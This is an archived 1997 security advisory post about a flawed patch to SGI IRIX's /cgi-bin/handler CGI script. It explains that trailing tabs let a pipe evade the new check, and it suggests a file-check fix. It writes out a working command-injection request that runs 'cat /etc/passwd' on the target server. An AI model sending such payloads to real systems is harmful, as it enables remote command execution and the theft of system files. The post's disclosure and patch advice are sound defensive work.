IRIX fails to correctly patch /cgi-bin/handler exploit

Summary
Description:In an apparent attempt to prevent breakins through the common handler cgi technique, IRIX changed the code. They now check the end of a string for a pipe (trying to make sure perl opens the file as a plain file), but you can still get away with putting tabs after the pipe, to hide it.
Author:Razvan Dragomirescu <drazvan@kappa.ro>
Compromise:remotely run commands through this pathetic CGI
Vulnerable Systems:IRIX 6.3 and 6.4, the older versions are vulnerable to an even easier version of the same problem.
Date:19 June 1997
Details


Date: Thu, 19 Jun 1997 23:06:13 +0300
From: Razvan Dragomirescu <drazvan@kappa.ro>
To: best-of-security@suburbia.net
Subject: BoS:      /cgi-bin/handler - more notes


Hi,

I have had reports that my exploit for SGI's /cgi-bin/handler does not
work on IRIX 6.3 (on O2).  I analyzed the code provided with IRIX
6.3 and they tried to fix it, but they actually DID NOT.

They added a new line to the script:

$doc=~s/\|*$// (in plain English, this means "remove any number of '|'s at
end-of-string"). But guess what. It works just as fine if you put another
TAB character after the "pipe" (so that the "pipe" is not at
end-of-string, the TAB is).

The exploit should read

telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download
HTTP/1.0

It tricks the script into executing the command anyway.
Now, for those of you who want to patch it somehow, here's the best
solution that has been posted to me (all credits for it go to Wolfram
Schneider <wosch@apfel.de>)

All "open" commands should check if the their argument is really a
filename. You could use:

-f $doc && open (INPUT, $doc)

(Same thing as: if (-f $doc) {open (INPUT, $doc) } , the one written
above is more PERL style)

I'm waiting to hear from you (my thanks to Lamont Grandquist who pointed
out the problem on IRIX 6.3).

So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
Anyone on IRIX 6.4? :) (What does it run on BTW?)

Be good.
Razvan
-------------------------------------------------------------------------------
RazvanDragomirescu Organization: KappaNet E-Mail: drazvan@kappa.ro,
drazvan@romania.ro Alternate E-mail: drazvan@iname.com, drazvan@guv.ro,
drazvan@pub.ro, drazvan@lbi.ro Phone: +40-1-6866621 NIC-HANDLE: RD1604
RIPE-HANDLE: RD38-RIPE
NO CARRIER

"Smile, tomorrow will be worse" (Murphy)
-------------------------------------------------------------------------------

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]